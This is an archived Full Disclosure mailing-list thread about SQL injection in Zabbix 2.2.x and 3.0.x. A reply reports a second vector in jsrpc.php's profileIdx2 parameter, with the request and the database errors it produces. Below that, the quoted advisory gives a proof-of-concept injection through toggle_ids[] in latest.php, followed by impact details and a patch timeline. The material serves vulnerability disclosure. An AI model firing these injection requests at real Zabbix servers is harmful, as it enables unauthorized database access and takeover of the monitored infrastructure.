Full Disclosure mailing list archives
Re: Zabbix 2.2.x, 3.0.x SQL Injection Vulnerability
From: Brandon Perry <bperry.volatile () gmail com>
Date: Fri, 12 Aug 2016 21:22:13 -0500
I actually ended up finding this vuln in a different vector (in the profileIdx2 parameter).
/zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471054088083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2’3297&updateProfile=true&screenitemid=&period=3600&stime=20170813040734&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
<div class="flickerfreescreen" data-timestamp="1471054088083" id="flickerfreescreen_1"><table class="list-table"
id="t57ae81946b8cb"><thead><tr><th class="cell-width">Timestamp</th><th>Value</th></tr></thead><tbody><tr
class="nothing-to-show"><td colspan="2">No data found.</td></tr></tbody></table></div><div class="msg-bad"><div
class="msg-details"><ul><li>Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES
(39, 1, 'web.item.graph.period', '3600', 2, 2'3297)] [You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near ''3297)' at line 1]</li><li>Error in query
[INSERT INTO profiles (profileid, userid, idx, value_str, type, idx2) VALUES (40, 1, 'web.item.graph.stime',
'20160813041028', 3, 2'3297)] [You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near ''3297)' at line 1]</li><li>Error in query [INSERT INTO profiles
(profileid, userid, idx, value_int, type, idx2) VALUES (41, 1, 'web.item.graph.isnow', '1', 2, 2'3297)] [You have an
error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use
near ''3297)' at line 1]</li></ul></div><span class="overlay-close-btn" onclick="javascript:
$(this).closest('.msg-bad').remove();" title="Close"></span></div>
Similarly, it requires auth unless you enable Guest.
On Aug 11, 2016, at 7:23 PM, 1n3 () hushmail com wrote: ========================================= Title: Zabbix 3.0.3 SQL Injection Vulnerability Product: Zabbix Vulnerable Version(s): 2.2.x, 3.0.x Fixed Version: 3.0.4 Homepage: http://www.zabbix.com Patch link: https://support.zabbix.com/browse/ZBX-11023 Credit: 1N3@CrowdShield ========================================== Vendor Description: ===================== Zabbix is an open source availability and performance monitoring solution. Vulnerability Overview: ===================== Zabbix 2.2.x, 3.0.x and trunk suffers from a remote SQL injection vulnerability due to a failure to sanitize input in the toggle_ids array in the latest.php page. Business Impact: ===================== By exploiting this SQL injection vulnerability, an authenticated attacker (or guest user) is able to gain full access to the database. This would allow an attacker to escalate their privileges to a power user, compromise the database, or execute commands on the underlying database operating system. Because of the functionalities Zabbix offers, an attacker with admin privileges (depending on the configuration) can execute arbitrary OS commands on the configured Zabbix hosts and server. This results in a severe impact to the monitored infrastructure. Although the attacker needs to be authenticated in general, the system could also be at risk if the adversary has no user account. Zabbix offers a guest mode which provides a low privileged default account for users without password. If this guest mode is enabled, the SQL injection vulnerability can be exploited unauthenticated. Proof of Concept: ===================== latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1 Result: SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (88, 1, 'web.latest.toggle', '1', 2, 15385); select * from users where (1=1) latest.php:746 → require_once() → CProfile::flush() → CProfile::insertDB() → DBexecute() in /home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185 Disclosure Timeline: ===================== 7/18/2016 - Reported vulnerability to Zabbix 7/21/2016 - Zabbix responded with permission to file CVE and to disclose after a patch is made public 7/22/2016 - Zabbix released patch for vulnerability 8/3/2016 - CVE details submitted 8/11/2016 - Vulnerability details disclosed _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Attachment:
signature.asc
Description: Message signed with OpenPGP using GPGMail
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Zabbix 2.2.x, 3.0.x SQL Injection Vulnerability 1n3 (Aug 12)
- Re: Zabbix 2.2.x, 3.0.x SQL Injection Vulnerability Brandon Perry (Aug 16)
- Re: Zabbix 2.2.x, 3.0.x SQL Injection Vulnerability 1n3 (Aug 16)
- Re: Zabbix 2.2.x, 3.0.x SQL Injection Vulnerability Brandon Perry (Aug 16)
- Re: Zabbix 2.2.x, 3.0.x SQL Injection Vulnerability 1n3 (Aug 16)
- Re: Zabbix 2.2.x, 3.0.x SQL Injection Vulnerability Brandon Perry (Aug 16)